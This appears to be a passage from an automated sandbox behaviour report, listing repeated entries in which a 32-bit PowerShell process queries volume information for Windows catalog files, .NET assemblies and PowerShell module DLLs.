Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
